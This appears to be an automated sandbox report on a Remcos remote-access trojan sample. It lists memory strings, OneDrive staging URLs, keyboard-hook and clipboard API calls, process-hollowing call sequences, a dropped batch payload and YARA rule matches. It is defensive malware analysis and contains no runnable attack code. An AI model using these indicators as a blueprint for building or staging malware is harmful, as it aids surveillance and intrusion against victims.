                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.0000000000772000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1739100863.000000000097D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                      Source: remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/S
                      Source: remcos.exe, 00000013.00000003.1914864143.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/l
                      Source: bhv2770.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhv2770.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhv2770.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
                      Source: remcos.exe, 00000013.00000003.1914864143.00000000007D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/B
                      Source: remcos.exe, 00000011.00000002.1739100863.0000000000926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/L
                      Source: remcos.exe, 00000013.00000002.1928082246.00000000140F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=FDB0512DE793B32E%21192&authkey=
                      Source: remcos.exe, 00000010.00000003.1645700884.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/gR
                      Source: remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/)hVS
                      Source: remcos.exe, 00000011.00000002.1739100863.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/D
                      Source: remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x989O9Y
                      Source: remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If59Adw
                      Source: remcos.exe, 00000013.00000002.1918208186.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mS7-09cDgh9l-spZEVYc4X4sz7LO4DIkbEuCnO10bm0osuWSl7tRLcAVFGx7-sRmq
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFoUs3a
                      Source: remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCejbl
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS43X7
                      Source: remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x98
                      Source: remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If5
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFo
                      Source: remcos.exe, 00000010.00000002.1647920314.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLC
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49725 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568A2B8 SetWindowsHookExA 0000000D,1568A2A4,000000000_2_1568A2B8
                      Installs a global keyboard hook
                      Source: C:\ProgramData\Remcos\remcos.exeWindows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exeJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_1568B70E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156968C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_156968C1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_1568B70E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_1568A3E0
                      Source: Yara matchFile source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569C9E2 SystemParametersInfoW,0_2_1569C9E2
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AAC9E2 SystemParametersInfoW,8_2_14AAC9E2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\Public\Libraries\CmzcxhwnO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                      PE file contains section with special chars
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: C:\ProgramData\Remcos\remcos.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156932D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_156932D2
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569BB35 OpenProcess,NtResumeProcess,CloseHandle,0_2_1569BB35
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569BB09 OpenProcess,NtSuspendProcess,CloseHandle,0_2_1569BB09
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02DFC3F8
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02DFC368
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02DFC4DC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DF7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02DF7968
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02DFC3F6
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DF7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02DF7AC0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DF7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02DF7966
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DF7F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02DF7F48
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DF7F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02DF7F46
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_02E0C4DC NtOpenFile,NtReadFile,6_2_02E0C4DC
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_02E07968 NtAllocateVirtualMemory,6_2_02E07968
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_02E07966 NtAllocateVirtualMemory,6_2_02E07966
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_02D7C4DC NtOpenFile,NtReadFile,8_2_02D7C4DC
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_02D77968 NtAllocateVirtualMemory,8_2_02D77968
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_02D77966 NtAllocateVirtualMemory,8_2_02D77966
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AAD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,8_2_14AAD58F
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AA32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,8_2_14AA32D2
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AABB35 OpenProcess,NtResumeProcess,CloseHandle,8_2_14AABB35
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AABB09 OpenProcess,NtSuspendProcess,CloseHandle,8_2_14AABB09
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFCA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,0_2_02DFCA6C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156967B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_156967B4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AA67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_14AA67B9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE265E0_3_02BE265E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE07190_3_02BE0719
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE13620_3_02BE1362
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE134B0_3_02BE134B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE10BD0_3_02BE10BD
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE14BD0_3_02BE14BD
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE04A90_3_02BE04A9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE049D0_3_02BE049D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE04850_3_02BE0485
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE20F20_3_02BE20F2
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE10D50_3_02BE10D5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE10C90_3_02BE10C9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE14C90_3_02BE14C9
